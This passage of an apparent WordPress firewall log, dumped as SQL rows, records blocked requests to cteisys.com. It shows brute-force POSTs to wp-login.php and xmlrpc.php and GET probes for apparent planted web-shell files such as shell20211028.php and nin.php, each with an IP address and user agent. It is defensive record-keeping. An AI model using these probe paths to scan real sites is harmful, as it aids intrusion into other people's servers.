Safari\\/537.36\"}','ct90vJEx1B5fnPAUGIroTVFZ',0,1664157112.1449,524,'','POST',403,0,515,0,1,'',0),('35.211.94.153',601054873,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','vRKDSMmbyAdGthZVczgNOrHl',0,1664157305.1565,7730,'','POST',403,0,515,0,1,'',0),('95.173.161.171',1605214635,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','6jnodGFrHD3Tsy2VJK7iQqup',0,1664158986.7163,20030,'','POST',403,0,515,0,1,'',0),('103.153.214.231',1738135271,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5cSFum78krDYn1PXpOfW4ibU',0,1664159809.6731,10493,'','POST',403,0,515,0,1,'',0),('141.98.102.243',2372036339,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Ybvc3B6Or7lWSRasUuDP5iNz',0,1664159801.0483,19117,'','POST',403,0,515,0,1,'',0),('165.232.183.66',2783491906,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','y9zZ5gqHr7Eth2PuDN04jLld',0,1664160641.8883,18740,'','POST',403,0,515,0,1,'',0),('103.90.235.70',1734011718,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','KAML5lDwhjBnrs1ptXVObo6S',0,1664162871.9783,20047,'','POST',403,0,515,0,1,'',0),('103.27.238.234',1729883882,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Xf6LGAMuvzrHesmE05VpUoDk',0,1664163753.1000,18877,'','POST',403,0,515,0,1,'',0),('208.113.149.124',3497104764,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','nJ8Ie4dDrR9Zutm6QVCyNajv',0,1664164578.4512,18393,'','POST',403,0,515,0,1,'',0),('208.113.149.124',3497104764,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','alCAzBX1YwE9IKteRyT2p4FH',0,1664171444.1741,19319,'','POST',403,0,515,0,1,'',0),('199.249.230.12',3355043340,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','fPoL6AsI8YgGn5jtHZKS1JzU',0,1664171494.9234,677,'','POST',403,0,515,0,1,'',0),('173.44.55.179',2905356211,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','BlxdjgLtenTpzYuZiwyv1bIA',0,1664172831.1913,18488,'','POST',403,0,515,0,1,'',0),('185.252.31.179',3120308147,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','aOwtSUHlYzg3AFPJpbfQcr4i',0,1664173203.8387,19130,'','POST',403,0,515,0,1,'',0),('185.252.31.179',3120308147,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','tZsNf6uGvaSXFxPO8kVp7lB2',0,1664174100.7077,18841,'','POST',403,0,515,0,1,'',0),('103.56.160.61',1731764285,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','i0ZCM8FrBEkTDxanymfb3Ysd',0,1664174991.5839,19713,'','POST',403,0,515,0,1,'',0),('212.33.197.207',3558983119,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','zw6t9XFuphKPa4RLlcsCveEM',0,1664177841.3816,18983,'','POST',403,0,515,0,1,'',0),('149.255.58.65',2516531777,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','SMjZCXdA9GYuPmihpUwyqNVH',0,1664178298.3305,8166,'','POST',403,0,515,0,1,'',0),('93.113.111.100',1567715172,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jrWxL8tbUoBVROQPA0unC2NY',0,1664179069.5569,2395,'','POST',403,0,515,0,1,'',0),('192.185.81.201',3233370569,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','OqZNbQH6I4M9J5thEaY72pyF',0,1664181090.1685,3284,'','POST',403,0,515,0,1,'',0),('88.135.37.49',1485251889,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','tMVbAuf7Skao14vimXrYUxy6',0,1664181483.6955,17468,'','POST',403,0,515,0,1,'',0),('192.227.178.147',3236147859,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HSyNPqVgAZhL0e9BWD8Tu7pY',0,1664181846.7465,18742,'','POST',403,0,515,0,1,'',0),('203.112.72.51',3413133363,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','6KBIGvE21DFCLJgdcaOPbmf5',0,1664182237.3733,1575,'','POST',403,0,515,0,1,'',0),('57.128.45.42',964701482,'','http://cteisys.com/wp-includes/shell20211028.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','8SVeLM51zwbgdp43FkmlqGIs',0,1664186854.7365,11610,'','GET',403,0,700,0,1,'',0),('57.128.45.42',964701482,'','https://cteisys.com/wp-includes/shell20211028.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','DUpsZSy0fkAC937crmNdnJXq',0,1664186874.1918,333,'','GET',403,0,700,0,1,'',0),('103.153.214.231',1738135271,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HOepCuZl0KG1cNEnP4Mf9diA',0,1664187056.8892,500,'','POST',403,0,600,0,1,'',0),('35.194.233.240',599976432,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8uFhXMzSAdiGtsJv9DWm72cn',0,1664187668.5055,499,'','POST',403,0,600,0,1,'',0),('128.199.134.216',2160559832,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','4pYVnrWKE5Cwo3TiPLH1tjcz',0,1664188264.5648,540,'','POST',403,0,600,0,1,'',0),('139.59.117.30',2335929630,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pmcKziND2FvOhfePR9qXkIyT',0,1664188872.9450,464,'','POST',403,0,600,0,1,'',0),('65.1.110.138',1090612874,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wSg76s3XC9odhl5RNvHfOUei',0,1664189504.3740,470,'','POST',403,0,600,0,1,'',0),('65.1.110.138',1090612874,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','DpdKzCWE3qcjBsn6197QYbXO',0,1664189647.2451,472,'','POST',403,0,600,0,1,'',0),('185.252.31.179',3120308147,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','CVYN5Xjc8emQIg0spdKuZwhO',0,1664192199.5716,479,'','POST',403,0,600,0,1,'',0),('107.180.247.212',1807022036,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rtu3SZyPesFcvwL7K2NpOhgH',0,1664192827.1859,539,'','POST',403,0,600,0,1,'',0),('101.43.127.191',1697349567,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qitZp3m259awJslWvVgeXQTR',0,1664193410.3787,514,'','POST',403,0,600,0,1,'',0),('93.113.111.100',1567715172,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','q7jWBUdzrmFTls3owyS4KH26',0,1664198842.8693,19184,'','POST',403,0,515,0,1,'',0),('138.197.144.236',2328203500,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','uXVqMKxadhCt74GT53AJBHIb',0,1664199172.6871,1311,'','POST',403,0,515,0,1,'',0),('43.205.46.185',734867129,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','T1dtep7kxVFCiQN9cHqSL50o',0,1664199557.7231,1472,'','POST',403,0,515,0,1,'',0),('130.61.143.194',2185072578,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','cRIiNBvO2b5dj6npQDLHMo8V',0,1664200551.6729,2322,'','POST',403,0,515,0,1,'',0),('162.219.250.15',2732325391,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jVQfFPGzHD2WB7ROo1AUpItm',0,1664200880.8640,2268,'','POST',403,0,515,0,1,'',0),('159.65.149.229',2671875557,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','U7oJiH0AXZhOr5MTWIvqgL1w',0,1664201273.0374,18292,'','POST',403,0,515,0,1,'',0),('167.172.79.125',2813087613,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Sm8U5KMBtLxJqeRrju60CyTz',0,1664202030.0353,18740,'','POST',403,0,515,0,1,'',0),('34.68.97.70',574906694,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wGvTaNeC6D7zqP20W8HOif5t',0,1664202452.0893,1363,'','POST',403,0,515,0,1,'',0),('192.210.196.65',3235038273,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7eqksQroSJOTIPfbH593XmAD',0,1664202844.3237,17182,'','POST',403,0,515,0,1,'',0),('103.154.177.165',1738191269,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','vPaWw30ptyX2SbqAB5ZUrR7e',0,1664203219.5774,615,'','POST',403,0,515,0,1,'',0),('162.219.250.15',2732325391,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','N7QnjkcbXqSVGze5hMLWaY2y',0,1664203989.5935,18590,'','POST',403,0,515,0,1,'',0),('193.176.230.188',3249596092,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','faop4Pg5WhBln760KTqHIxtN',0,1664204398.6504,10540,'','POST',403,0,515,0,1,'',0),('178.128.187.183',2994781111,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','N3gITRfSP685b9vrGqKCLcBA',0,1664209333.6313,18503,'','POST',403,0,600,0,1,'',0),('208.113.171.103',3497110375,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','fyrPWTmviO8kBc1QS2jNMqYA',0,1664210316.5192,15981,'','POST',403,0,600,0,1,'',0),('103.130.219.13',1736629005,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','f7cCthRidBbOJ5wHplA0yg3V',0,1664211306.6110,3112,'','POST',403,0,600,0,1,'',0),('51.75.15.189',860557245,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','UmyfHTlNre461wJz3kIF9Y8P',0,1664214262.3783,6792,'','POST',403,0,600,0,1,'',0),('184.75.223.195',3091980227,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','hoiOLqnR0W1vrb5IMfuk2eQ7',0,1664214585.5829,2344,'','POST',403,0,515,0,1,'',0),('57.128.45.42',964701482,'','https://cteisys.com/wp-admin/css/colors/blue/nin.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','x81CRZFMQUyvliHPNqDzGV5c',0,1664216225.7297,400,'','GET',403,0,700,0,1,'',0),('35.187.58.136',599472776,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','9i2aKILSzAudYhCMl4RTvFgm',0,1664217178.8450,7054,'','POST',403,0,600,0,1,'',0),('109.168.97.89',1839751513,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','dTCQW9oaceNwgs5vGuJIr1kp',0,1664218148.3705,1205,'','POST',403,0,600,0,1,'',0),('194.38.20.161',3257275553,'','http://cteisys.com/wp-content/themes/famous/megaframe/megapanel/inc/functions.php','','{\"1\":\"ALittle Client\"}','RISpKiVfusWraToAGQ9dczl5',0,1664218815.1981,2079,'','GET',403,0,700,0,1,'',0),('187.32.211.193',3139490753,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','7254o9icx1zvHXNaLGSAKdWe',0,1664219104.8350,6365,'','POST',403,0,600,0,1,'',0),('104.248.124.41',1761115177,'','https://cteisys.com/css/load.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','WsSXgQvw5OLMDR6pt83AjqlV',0,1664227339.1134,337,'','GET',403,0,700,0,1,'',0),('104.248.124.41',1761115177,'','https://cteisys.com/votes.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','InCQasXxp8o1q9LYtJiO6uye',0,1664227339.9504,288,'','GET',403,0,700,0,1,'',0),('104.248.124.41',1761115177,'','https://cteisys.com/2index.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','efT1sczJVdDlH3EWx2Q7pYmU',0,1664227340.7657,303,'','GET',403,0,700,0,1,'',0),('104.248.124.41',1761115177,'','https://cteisys.com/1index.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','1So3nlrvjUFIKTgB5YXubHGN',0,1664227341.6078,292,'','GET',403,0,700,0,1,'',0),('104.248.124.41',1761115177,'','https://cteisys.com/?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','kbWZiACwy2nHIJlGedRzOBmx',0,1664227342.5131,303,'','GET',403,0,700,0,1,'',0),('104.248.124.41',1761115177,'','https://cteisys.com/load.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','3VZN5adMSr9njYtXEqg641o8',0,1664227343.4136,332,'','GET',403,0,700,0,1,'',0),('104.248.124.41',1761115177,'','https://cteisys.com/wikindex.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','pfwnsNF5UDHjCzV73yaoMXbA',0,1664227344.5622,302,'','GET',403,0,700,0,1,'',0),('104.248.124.41',1761115177,'','https://cteisys.com/xmlrpc.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','jJEYOohZanBdyt4Pxpc3KuwL',0,1664227345.3659,303,'','GET',403,0,515,0,1,'',0),('69.163.152.108',1168349292,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','RaF2JXk5pt16DTfPOQoIGjV8',0,1664227688.4863,17208,'','POST',403,0,600,0,1,'',0),('147.135.255.8',2475163400,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','1MNl4XIO6gyeB9bsKxruQ8dP',0,1664228638.1333,17488,'','POST',403,0,600,0,1,'',0),('110.40.244.196',1848177860,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','exa5EMQzlgGPndyZkthoAbiX',0,1664229585.4740,1209,'','POST',403,0,600,0,1,'',0),('103.130.218.189',1736628925,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','nMwU4Z7iA1aRoHvBDqPIWKuG',0,1664231520.8151,3308,'','POST',403,0,600,0,1,'',0),('144.217.15.207',2430144463,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','FkUJmS2GaX6vCy73fWilxZHb',0,1664232490.8143,17342,'','POST',403,0,600,0,1,'',0),('85.146.18.88',1435636312,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','omghERbAOlYLHMjB2VWr6yXP',0,1664235425.4337,1440,'','POST',403,0,600,0,1,'',0),('103.56.160.61',1731764285,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','6DoynueMpTrSLQ2gUwWi7Zvf',0,1664235811.4508,4676,'','POST',403,0,515,0,1,'',0),('212.103.4.29',3563521053,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','It9BuFJHwkGeCSiNP6E8n4z1',0,1664236408.9442,3310,'','POST',403,0,600,0,1,'',0),('62.90.101.113',1046111601,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','QT0ELksMR6fXgC8tD15NS3me',0,1664236445.1406,1851,'','POST',403,0,515,0,1,'',0),('198.136.54.132',3330815620,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sGVMTknZYjWOg0Npm7xv3B5A',0,1664236473.8281,525,'','POST',403,0,515,0,1,'',0),('212.38.40.215',3559270615,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','aPAyxOnwYsoJQtfKhlmEpNvV',0,1664237773.9296,18593,'','POST',403,0,515,0,1,'',0),('103.35.64.73',1730363465,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wz3WAebCS854YqPlfmpQxaZM',0,1664237791.3263,1661,'','POST',403,0,515,0,1,'',0),('20.101.71.221',342181853,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','6agwL3jNyXUHvb5fiPSWIoux',0,1664238379.7517,1190,'','POST',403,0,600,0,1,'',0),('185.197.195.173',3116745645,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fAgBtnewWkUHZ1VDc8TmLN24',0,1664238443.5079,2585,'','POST',403,0,515,0,1,'',0),('146.70.61.147',2454076819,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','g52tUmRFkOoPGqu1KfIpbDLS',0,1664238460.9378,513,'','POST',403,0,515,0,1,'',0),('190.92.159.48',3193741104,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','kcL6t2XDjnKvQfAGUpz1Mu38',0,1664238478.4661,505,'','POST',403,0,515,0,1,'',0),('81.68.87.46',1363433262,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','KSVTI5z0lue7UXJPhtWfBNF9',0,1664239109.1444,18119,'','POST',403,0,515,0,1,'',0),('161.35.52.207',2703439055,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','Nwi0dMebVApRZCkgoHvcP1Kt',0,1664239365.0977,567,'','POST',403,0,600,0,1,'',0),('209.58.173.138',3510283658,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','YGT84uzMiVqhFU0ZBxydK5Jl',0,1664239799.5771,9060,'','POST',403,0,515,0,1,'',0),('64.20.39.18',1075062546,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3azRYQ0SPUIoprWlqZNAO5G7',0,1664239791.1003,17706,'','POST',403,0,515,0,1,'',0),('157.0.140.186',2634058938,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dfOEk6YbPQHAghILutiJm9vl',0,1664239848.7763,1404,'','POST',403,0,515,0,1,'',0),('57.128.45.42',964701482,'','http://cteisys.com/wp-commentin.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','vhIlPj425FWpNAOqYRB3MdwQ',0,1664240260.5281,3144,'','GET',403,0,700,0,1,'',0),('57.128.45.42',964701482,'','https://cteisys.com/wp-commentin.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','7bfB6oWzDgiJFZEP1XHNuC0m',0,1664240270.0476,282,'','GET',403,0,700,0,1,'',0),('167.71.63.47',2806464303,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','EsCILW6uifA31dxcTPkaQ04Y',0,1664240349.3639,3535,'','POST',403,0,600,0,1,'',0),('39.108.148.88',661427288,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.87 Safari\\/537.36\"}','TCPdEF1h4ZQRspDx7gc6La02',0,1664241339.4580,1807,'','POST',403,0,600,0,1,'',0),('151.80.67.229',2538619877,'','http://cteisys.com/wp-static.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 